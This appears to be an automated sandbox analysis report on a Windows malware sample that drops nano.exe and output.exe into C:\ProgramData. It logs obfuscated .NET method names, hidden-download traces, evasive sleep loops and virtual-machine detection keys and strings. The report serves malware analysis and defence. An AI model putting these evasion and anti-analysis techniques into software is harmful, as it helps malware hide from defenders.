Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\nano.exe			Jump to dropped file
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\output.exe			Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\nano.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	File created: C:\ProgramData\output.exe	Jump to dropped file
Source: C:\ProgramData\nano.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\ProgramData\nano.exe

File opened: C:\ProgramData\nano.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\nano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\output.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe TID: 6916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\nano.exe TID: 5884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\nano.exe TID: 6292	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99843s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99733s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99624s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99515s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99279s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99168s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99060s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98952s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98623s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98515s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -98406s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 6224	Thread sleep time: -99937s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 5512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\output.exe TID: 2880	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\nano.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\ProgramData\nano.exe	Window / User API: threadDelayed 890	Jump to behavior
Source: C:\ProgramData\nano.exe	Window / User API: foregroundWindowGot 1016	Jump to behavior
Source: C:\ProgramData\nano.exe	Window / User API: foregroundWindowGot 383	Jump to behavior
Source: C:\ProgramData\output.exe	Window / User API: threadDelayed 976	Jump to behavior
Source: C:\ProgramData\output.exe	Window / User API: threadDelayed 2661	Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\ProgramData\output.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosInformation	Jump to behavior
Source: C:\ProgramData\output.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0	Jump to behavior
Source: C:\ProgramData\output.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\ProgramData\nano.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\nano.exe

Code function: 2_2_054D12DA GetSystemInfo,

2_2_054D12DA

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\nano.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99843	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99733	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99624	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99515	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99279	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99168	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99060	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98952	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98623	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98515	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 98406	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 99937	Jump to behavior
Source: C:\ProgramData\output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: output.exe.0.dr	Binary or memory string: SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp	Binary or memory string: ISYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp	Binary or memory string: KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: output.exe.0.dr	Binary or memory string: vmware
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	Binary or memory string: virtualboxvboxqemu
Source: output.exe	Binary or memory string: SOFTWARE\VMWare, Inc.\VMWare Tools
